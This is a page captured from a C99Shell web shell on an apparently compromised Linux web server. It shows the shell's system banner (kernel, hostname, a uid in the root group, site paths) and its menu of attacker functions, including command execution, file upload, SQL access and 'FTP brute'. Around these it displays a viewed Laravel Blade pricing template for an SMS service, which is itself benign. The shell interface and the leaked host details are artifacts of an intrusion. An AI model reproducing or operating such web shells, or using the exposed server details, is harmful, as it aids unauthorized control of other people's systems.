!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_old/resources/views/front/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.54%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     pricing.blade.php (7.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.frontLayout')

@section('title') {{get_settings('app_name')}} - {{trans('admin.pricing')}} @endsection

@section('css')
    <style>
        .ribbon-wrapper .ribbon {
            font-size: 10px !important;
            padding: 8px 4px 8px 4px !important;
        }
        .ribbon-wrapper {
            height: 70px;
            overflow: hidden;
            position: absolute;
            width: 70px;
            z-index: 10;
            margin-top: 6px !important;
            top: 10px;
            right: 35px;
        }
        .ribbon-wrapper .ribbon {
            box-shadow: 0 0 3px rgba(0,0,0,.3);
            font-size: .8rem;
            line-height: 100%;
            padding: 0.375rem 0;
            position: relative;
            right: -2px;
            text-align: center;
            text-shadow: 0 -1px 0 rgba(0,0,0,.4);
            text-transform: uppercase;
            top: 10px;
            -webkit-transform: rotate(45deg);
            transform: rotate(45deg);
            width: 90px;
        }
        .bg-danger{
            color: #fff!important;
            background-color: #f0696c !important;
        }
        .card-pricing.marked .body p a{
            color:white !important;
        }
        .card-pricing.marked .body p{
            color:white !important;
        }
        .footer .btn-pricing{
            color: black !important;
        }
    </style>
    @endsection

@section('header')

    <div class="container">
        <div class="page-banner">
            <div class="row justify-content-center align-items-center h-100">
                <div class="col-md-6">
                    <nav aria-label="Breadcrumb">
                        <ul class="breadcrumb justify-content-center py-0 bg-transparent">
                            <li class="breadcrumb-item"><a href="{{route('home')}}">{{trans('admin.home')}}</a></li>
                            <li class="breadcrumb-item active">{{trans('admin.pricing')}}</li>
                        </ul>
                    </nav>
                    <h1 class="text-center">{{trans('admin.pricing')}}</h1>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('main-section')
    @php $template = json_decode(get_settings('template')); @endphp
    @if($plans->isNotempty())
        <div class="page-section">
            <div class="container">
                <div class="text-center wow fadeInUp">
                    <div class="subhead">{{trans('admin.pricing_plan')}}</div>
                    <h2 class="title-section">
                        @if(isset($template) && isset($template->sec_six_title))
                            {!!clean($template->sec_six_title)!!}
                        @endif
                    </h2>
                    <div class="divider mx-auto"></div>
                </div>
                <div class="row mt-5">
                    @foreach($plans as $key=>$plan)
                        <div class="col-lg-4 py-3 wow zoomIn">
                            @if($plan->set_as_popular=='yes')
                                <div class="ribbon-wrapper">
                                    <div class="ribbon bg-danger">
                                        Popular
                                    </div>
                                </div>
                            @endif

                            <div class="card-pricing {{$key==0?'marked':''}}">
                                <div class="header">
                                    <div class="pricing-type">{{$plan->title}}</div>
                                    <div class="price">
                                        <span class="dollar"></span>
                                        <h1>{{trans('For')}}:  {{formatNumberWithCurrSymbol($plan->price)}}<span class="suffix d-none">.99</span></h1>
                                    </div>
                                    <h5>{{ucfirst(str_replace('_','-',$plan->recurring_type))}}</h5>
                                </div>
                                <div class="body">
                                    <p>
                                        <small>{{$plan->short_description}}</small>
                                    </p>

                                    <p class="text-muted"><strong>{{trans('Recurring Type')}}</strong>:  {{ucfirst($plan->recurring_type)}}</p>
                                    @if($plan->unlimited_contact=='yes')
                                        <p class="text-muted"><strong>{{trans('Contact Limit')}}</strong>: {{trans('Unlimited')}}</p>
                                    @else
                                        <p class="text-muted"><strong>{{trans('Contact Limit')}}</strong>:  {{$plan->max_contact}}</p>
                                    @endif

                                    @if($plan->unlimited_contact_group=='yes')
                                        <p class="text-muted"><strong>{{trans('Group Limit')}}</strong>: {{trans('Unlimited')}}</p>
                                    @else
                                        <p class="text-muted"><strong>{{trans('Group Limit')}}</strong>:  {{$plan->contact_group_limit}}</p>
                                    @endif
                                    <p class="text-muted"><strong>{{trans('Free SMS Unit')}}</strong>: {{$plan->free_sms_credit}}</p>
                                    <p class="text-muted"><strong>{{trans('SMS Unit Price')}}</strong>: {{$plan->sms_unit_price}}</p>

                                    @if($plan->api_availability=='yes')
                                        <p class="text-muted"><strong>{{trans('API Available')}}</strong>: Yes</p>
                                    @else
                                        <p class="text-muted"><strong>{{trans('API Available')}}</strong>: No</p>
                                    @endif
                                    <p class="text-muted"><strong>{{trans('SMS Send Limit')}}</strong>: {{$plan->sms_sending_limit}}(<small>Per Month</small>)</p>

                                    <p>{{trans('customer.unlimited_support')}}</p>
                                    <p>{{trans('customer.cancel_anytime')}}</p>
                                    <p class="text-muted">
                                        <a href="{{route('coverage',[$plan->id])}}" target="_blank">See Coverage</a>
                                    </p>

                                </div>
                                <div class="footer">
                                    @if(auth('customer')->check())
                                        @if(Module::has('PaymentGateway') && Module::find('PaymentGateway')->isEnabled())
                                            <form action="{{route('paymentgateway::process')}}" method="post">
                                                @csrf
                                                <input type="hidden" name="id" value="{{$plan->id}}">
                                                <button type="submit" class="btn btn-pricing btn-block text-white">{{trans('admin.subscribe')}}
                                                </button>
                                            </form>
                                        @endif
                                    @elseif(get_settings('registration_status')=='enable')
                                        <a href="{{route('signup',['plan'=>$plan->id])}}"
                                           class="btn btn-pricing btn-block text-white">{{trans('admin.subscribe')}}</a>
                                    @endif
                                </div>
                            </div>
                        </div>
                    @endforeach
                </div>
            </div> <!-- .container -->
        </div> <!-- .page-section -->
    @endif
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--